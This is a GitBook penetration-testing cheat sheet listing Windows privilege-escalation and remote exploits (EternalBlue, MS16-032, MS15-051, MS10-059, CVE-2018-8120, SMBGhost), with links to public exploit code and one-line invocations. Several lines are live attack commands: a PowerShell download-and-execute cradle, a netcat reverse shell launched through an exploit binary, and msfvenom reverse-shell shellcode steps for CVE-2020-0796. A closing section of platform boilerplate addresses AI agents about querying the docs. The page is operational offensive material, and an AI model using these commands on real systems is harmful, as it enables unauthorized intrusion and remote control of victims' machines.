> For the complete documentation index, see [llms.txt](https://kashz.gitbook.io/kashz-jewels/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kashz.gitbook.io/kashz-jewels/services/windows-exploits.md). # windows exploits ## MS08-067 Exploit * * ## MS-17-010 EternalBlue Exploit * msf: * checker: `use auxiliary/scanner/smb/smb_ms17_010` * exploit: `use exploit/windows/sbm/ms17_010_eternalblue` * [eternalblue\_manual\_exploit](https://root4loot.com/post/eternalblue_manual_exploit/) * no pipes needed | manual method * [helviojunior/MS17-010.git](https://github.com/helviojunior/MS17-010.git) * update username as guest / anonymous (if needed) * `python send_and_execute.py TARGET_IP SHELL.exe` * [3ndG4me/AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) * ensure to run pre requisites * `python zzz_exploit.py TARGET_IP` * [exploit-db/42315](https://www.exploit-db.com/exploits/42315) ## MS-16-032 Exploit * [EmpireProject/Invoke-MS16032.ps1](https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1) * `Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('shell.ps1')"` ## Windows 7 * MS11-046 | CVE-2011-1249 | win7 6.1.7600 N/A Build 7600 x86 * [abatchy17/MS11-046](https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046) * MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86 * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled) * `MS10-059.exe KALI_IP PORT` ## MS09-050 'srv2.sys' SMB Code Execution (Python) * [exploit-db/40280](https://www.exploit-db.com/exploits/40280) ## MS09-002 Memory Corruption IE7 Exploit * msf: `use windows/browser/ms09_002_memory_corruption` ## Windows Server 2008 R2 SP1 * CVE-2018-8120 * Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) ## Windows 7 SP1 * CVE-2018-8120 * Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) ## Windows Server 2008 SP1 * CVE-2018-8120 * Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) * MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86 * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled) * `MS10-059.exe KALI_IP PORT` ## Windows Server 2003 * MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86 * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled) * `MS10-059.exe KALI_IP PORT` ## Windows Server 2012 R2 Standard * MS16-098 | CVE-2016-3309 | Server 2012 R2 Standard 6.3.9600 N/A Build 9600 * [SecWiki/MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098) ## Windows Server 2008 R2 * MS15-05 * [SecWiki/MS15-051/MS15-051-KB3045171.zip](https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip) * `ms15-051.exe "nc64.exe -c cmd.exe IP PORT"` * MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86 * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled) * `MS10-059.exe KALI_IP PORT` ## Windows XP SP1 * Local PE using Windows Services (upnphost and SSDPSRV) * ## CVE-2020-0796 | smbhghost **REQUIREMENTS:** * needs smb port:445 open ### Steps: 1. [danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796) 2. Generate shellcode using `msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -f csharp` 3. Update shellcode on line 204 file: `exploit.cpp` 4. Set TARGET\_ARCH and set for RELEASE 5. Build solution 6. Run `cve-2020-0796-local.exe` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/kashz-jewels/services/windows-exploits.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.